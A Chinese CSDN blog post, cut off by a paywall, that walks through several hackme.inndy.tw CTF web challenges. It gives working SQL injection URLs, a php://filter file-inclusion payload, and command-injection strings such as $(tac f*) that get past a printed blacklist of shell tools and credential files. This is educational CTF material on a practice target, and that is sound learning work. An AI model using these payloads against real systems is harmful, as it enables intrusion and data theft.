Hackme Writeup

最新推荐文章于 2024-05-12 22:33:24 发布
最新推荐文章于 2024-05-12 22:33:24 发布
阅读量1w 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42348709/article/details/90400497
版权
本文是一篇关于 Hackme 游戏的详细攻略,涵盖了 SQL 注入、LFI(本地文件包含)、源码审计、命令注入、XSS 攻击等多个环节,通过分析源码和利用漏洞,逐步揭示隐藏的挑战和获取旗帜。
摘要由CSDN通过智能技术生成

https://wywwzjj.top/2019/02/02/Hackme-Writeup/

hide and seek

Can you see me? I’m so close to you but you can’t see me.

这题查看源码即可。

guestbook

This guestbook sucks. sqlmap is your friend.

既然提示有 sqlmap ,或许可以一把梭。

先手注一波试试,发现没有任何过滤。

有四个字段,看一下显位

https://hackme.inndy.tw/gb/?mod=read&id=0 union select 1,2,3,4

都有明显回显,直接上吧,盲注太慢。

拿到列名

https://hackme.inndy.tw/gb/?mod=read&id=0 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

查询所有数据

https://hackme.inndy.tw/gb/?mod=read&id=0 union select 1,2,3,group_concat(flag) from flag

LFI

What this admin’s password? That is not important at all, just get the flag. Tips: LFI, php://filter

用到 PHP 伪协议:php://filter

php://filter/read=convert.base64-encode/resource=pages/login

// 得到 login.php
<?php
require('config.php');
if($_POST['user'] === 'admin' && md5($_POST['pass']) === 'bed128365216c019988915ed3add75fb') {
   
    echo $flag;
} else {
   
?>
<form action="?page=pages/login" method="post" role="form">
	<div class="form-group">
		<label for="user-i">User</label>
		<input type="text" class="form-control" id="user-i" placeholder="Username" name="user">
	</div>
	<div class="form-group">
		<label for="pass-i">Password</label>
		<input type="password" class="form-control" id="pass-i" placeholder="Password" name="pass">
	</div>
	<button type="submit" class="btn btn-primary">Login</button>
</form>
<?php } ?>
    
// 再看下 config.php,拿到 flag
$flag = "FLAG{Yoooooo_xsXSYP......}";

homepage

Where is the flag? Did you check the code?

提示查看源代码,发现了一个特别的 cute.js

嚝从㚁����= /嚚�嚚榅湛�㚁�� ~�?���?   //*織����*/ ['_']; o=(嚝�蔑嚝�)  =_=3; c=(嚝巵矋��) =(嚝�蔑嚝�)-(嚝�蔑嚝�); (嚝氱䈑��) =(嚝巵矋��)= (o^_^o)/ (o^_^o);(嚝氱䈑��)={嚝巵矋��: '_' ,嚝从㚁���� : ((嚝从㚁����==3) +'_') [嚝巵矋�篏 ,嚝�蔑嚝��� :(嚝从㚁����+ '_')[o^_^o -(嚝巵矋��)] ,嚝氱䈑����:((嚝�蔑嚝�==3) +'_')[嚝�蔑嚝篏 }; (嚝氱䈑��) [嚝巵矋�篏 =((嚝从㚁����==3) +'_') [c^_^o];(嚝氱䈑��) ['c'] = ((嚝氱䈑��)+'_') [ (嚝�蔑嚝�)+(嚝�蔑嚝�)-(嚝巵矋��) ];(嚝氱䈑��) ['o'] = ((嚝氱䈑��)+'_') [嚝巵矋�篏;(嚝剠嚝�)=(嚝氱䈑��) ['c']+(嚝氱䈑��) ['o']+(嚝从㚁���� +'_')[嚝巵矋�篏+ ((嚝从㚁����==3) +'_') [嚝�蔑嚝篏 + ((嚝氱.......

别的师傅说是 aaencode 加密,我有点懵逼,以后再弄吧,这种题不值得多花时间。

ping

Can you ping 127.0.0.1?

看来是源码审计的题目,命令注入。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Ping</title>
</head>
<body>
    <form action="." method="GET">
        IP: <input type="text" name="ip"> <input type="submit" value="Ping">
    </form>
    <pre><?php
        $blacklist = [
            'flag', 'cat', 'nc', 'sh', 'cp', 'touch', 'mv', 'rm', 'ps', 'top', 'sleep', 'sed',
            'apt', 'yum', 'curl', 'wget', 'perl', 'python', 'zip', 'tar', 'php', 'ruby', 'kill',
            'passwd', 'shadow', 'root',
            'z',
            'dir', 'dd', 'df', 'du', 'free', 'tempfile', 'touch', 'tee', 'sha', 'x64', 'g',
            'xargs', 'PATH',
            '$0', 'proc',
            '/', '&', '|', '>', '<', ';', '"', '\'', '\\', "\n"
        ];

        set_time_limit(2);

        function ping($ip) {
            global $blacklist;

            if(strlen($ip) > 15) {
                return 'IP toooooo longgggggggggg';
            } else {
                foreach($blacklist as $keyword) {
                    if(strstr($ip, $keyword)) {
                        return "{$keyword} not allowed";
                    }
                }
                $ret = [];
                exec("ping -c 1 \"{$ip}\" 2>&1", $ret);
                return implode("\n", array_slice($ret, 0, 10));
            }
        }

        if(!empty($_GET['ip']))
            echo htmlentities(ping($_GET['ip']));
        else
            highlight_file(__FILE__);
    ?></pre>
</body>
</html>

发现 $ 没有在黑名单内,还可以 ``

$(ls) / `ls`
ping: flag.php 
index.php: Name or service not known

# cat 被过滤了,但有一堆可以查看文件内容的命令啊
tac  从最后一行开始显示,可以看出 tac 是 cat 的倒着写! 
more 一页一页的显示档案内容 
lessmore 类似,但是比 more 更好的是,他可以往前翻页! 
head 只看头几行 
tail 只看尾巴几行 
nl   显示的时候,顺道输出行号!

# 加个 * 模糊匹配一下
$(tac f*)
ping: $flag = 'FLAG{ping_$(capture-the-flag)_U.....}';
<?php: Name or service not known

scoreboard

DO NOT ATTACK or SCAN scoreboard, you don’t need to do that.

header 里发现了 x-flag

login as admin 0

SQL Injection!

题目直接给了源码,开始审计。

<?php
require('config.php');

// table schema
// user -> id, user, password, is_admin

function safe_filter($str) {
   
    $strl = strtolower($str);
    if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') ||
        strstr($strl, 'update') || strstr($strl, 'delete')
    ) {
   
        return '';
    }
    return str_replace("'", "\\'", $str);
    // \' => \\'
}

$_POST = array_map(safe_filter, $_POST);

$user = null;

// connect to database

if(!empty($_POST['name']) && !empty($_POST['password'])) {
   
    $connection_string = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', DB_HOST, DB_NAME);
    $db = new PDO($connection_string, DB_USER, DB_PASS);
    $sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'",
        $_POST['name'],
        $_POST['password']
    );
    try {
   
        $query = $db->query($sql);
        if($query) {
   
            $user = $query->fetchObject();
        } else {
   
            $user = false;
        }
    } catch(Exception $e) {
   
        $user = false;
    }
}


<?php if(!$user): ?>
<?php
最低0.47元/天 解锁文章
wywwzjj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2023 强网杯 Writeup
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
最受欢迎的电影网站前15名(2014年10月)
phoenixtree7的专栏
10-14 9万+
Top 15 Most Popular Movie Websites | October 2014 Here are the top 15 Most Popular Movie Sites as derived from our eBizMBA Rank which is a continually updated average of each website's Alexa Glob
m3u8源地址,抓片....下片....看片都透露给你
LLLLLLllllIlll的博客
01-28 32万+
这段时间为了下载网页视频(网课、电影等),接触到了 m3u8 文件。在折腾了一段时间之后,猫君越发喜爱上这个格式的文件。今儿特意将关于 m3u8 格式视频链接获取方式、下载方法,以及相关的进阶操作整理成文。若诸位看官有什么更妙的使用方案,不妨分享一二。 恐怕有些朋友对 m3u8 文件还不甚了解,先作个科普吧—— m3u8 是 HLS 协议的部分内容,而 HLS 又是由苹果公司提出的基于 HTTP 的流媒体网络传输协议。其实现的基本原理是将一个大的媒体文件进行分片,而分片文件资源的路径记录于 m3u8 文
看完这篇 教你玩转渗透测试靶机vulnhub——Hack Me Please 1_vlunhub hack_me_please(2)
最新发布
2401_84765537的博客
05-12 358
学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**
嵌入式学习文章推荐+资料下载
03-10 1845
盘点日本人最常用50个网站(珍藏版)
m0_50414588的博客
01-24 587万+
1、yahoo.co.jp 日本雅虎在日本简直就是神一样的存在,发生什么突发事情,日本人第一直觉就是上日本雅虎上看看新闻。搜索的大部分也是通过日本雅虎。Google虽然也有在努力,不过,搜索方面还是日本雅虎强一些啦。 —————————————————— 2、google.co.jp Google大神的日本版网站 —————————————————— 3、google.com 其实日本人也是很喜欢学英语的…… —————————————————— 4、amazon.co.jp アマゾン在日本的物流非常强,在
“91系列”资源网凉了,500余网站被封杀!
趣学程序
12-23 7万+
感谢关注趣学程序!公众号内部回复666获取热门教程 来源:扩展迷EXTFANS哈喽,各位新来的小伙伴们,大家好!由于公众号做了改版,为了保证公众号的资源能准时推送到你手里,大家记得将咱...
古典加密writeup
01-05
做CTF时遇到的古典加密的问题,自己写的writeup,信息安全专业的
WriteUp模板1
08-08
WriteUp模板1-文档编写指南 WriteUp模板1是用于编写解题报告的模板,旨在帮助参与校赛的选手编写高质量的解题报告。本文将详细介绍 WriteUp 模板1 的结构和编写要求,帮助选手更好地编写解题报告。 标题 WriteUp ...
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
老板口中的一区二区是什么意思?
热门推荐
振华OPPO的博客世界
09-30 638万+
一区和二区一般指中科院的期刊分区级别。SCI英文全称为:Science Citation Index,中文翻译为:科学引用索引。SCI的目标是提供高质量的学术资源,帮助研究人员了解最新的科学研究动态,并促进学术交流与合作。1区,2区,3区,4区是SCI期刊的分区,SCI期刊的分区有两种,一种是JCR的分区,另一个是中科院的分区,这两类分区很类似,都是分为4个区,分区的标准也都是期刊的影响因子。
40余个超好用的在线影视站点
Hern(宋兆恒)
01-01 24万+
综合影视 低端电影:http://ddrk.me/ 1090影视:https://1090ys.com 碟影世界:http://www.952780.com/ 播王:https://bowan.su/ 吾爱看电影:http://www.5aikp.com/ 魔力电影网:https://magbt.net/ 胖子视频:http://www.pangzitv.com/ 白鹿影院:htt...
十部值得一看的电影
天下文章一大抄,只有做得好,没有抄的好!
03-25 245万+
 十部值得一看的电影 【文件名称】----男人应该看的十部电影.torrent【文件大小】----6.47G【文件描述】1.罗马假日【爱情】 ◆原 名:Roman Holiday ◆译 名:罗马假日/罗马假期/金枝玉叶 ◆导  演:威廉 惠勒 (William Wyler) ◆演 员:格里高利 派克 (Gregory Peck) 奥黛丽 赫本 (Audr
http:/222.212.79/app/zscd.html,emscripten/src/shell.html at 1.29.12 · emscripten-core/emscripten · G...
weixin_36304957的博客
06-21 21万+
version="1.1"id="Layer_1"x="0px"y="0px"width="296px"height="78px"viewBox="420 120 100 170"enable-background="new 0 0 900 400"xml:space="preserve"inkscape:version="0.48.4 r9939"sodipodi:docname="emscri...
http://91.3p7.us/index.php,bee/new.go at b412890c3385694a5a0034d07c703f1eabd3a22e · ws6/bee · GitHub...
weixin_42348783的博客
03-16 30万+
background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAADICAYAAACtWK6eAAAgAElEQVR42uy9d5Rd13Xm+TvnxhfrVS5UIRSIQEIAQUpMIKlEylGWZblbTi27veyWJXcvjZqW7TVrrPG0Q0vyTKtHtnuWou0ZS1Y7yDOyksd...
signature=f0f7fa8c833e8eeadc4dc7b7a1157b91,yarn.lock
weixin_33550394的博客
05-30 6830
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@babel/code-frame@^7.0.0", "@babel/code-frame@^7.10.4":version "7.10.4"resolved "https://registry.npm.taobao.org/@bab...
一区即将要洗的DVD片子
现在的生活
10-08 431万+
101 Dalmatians [Animated] (2009, SE)《101斑点狗》预计2009年发行特别版12 Monkeys (05/10/2005, COM DOC)《12只猴子》预计2005年5月10日发行扩展版加评论和记录片等2001: A Space Odyssey (2006, SE)《2001:太空漫游》预计2006年发行特别版21 Grams (SE)《21克》特
GKCTF2021 WriteUp:Web漏洞利用与EJS RCE详解
"GKCTF2021官方WriteUp包含了两个主要的Web安全挑战:ezcms和eznode。在ezcms中,利用模板注入和目录穿越漏洞获取flag;在eznode中,通过绕过严格过滤的WAF并利用原型链污染实现远程代码执行(RCE)" 在ezcms挑战中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值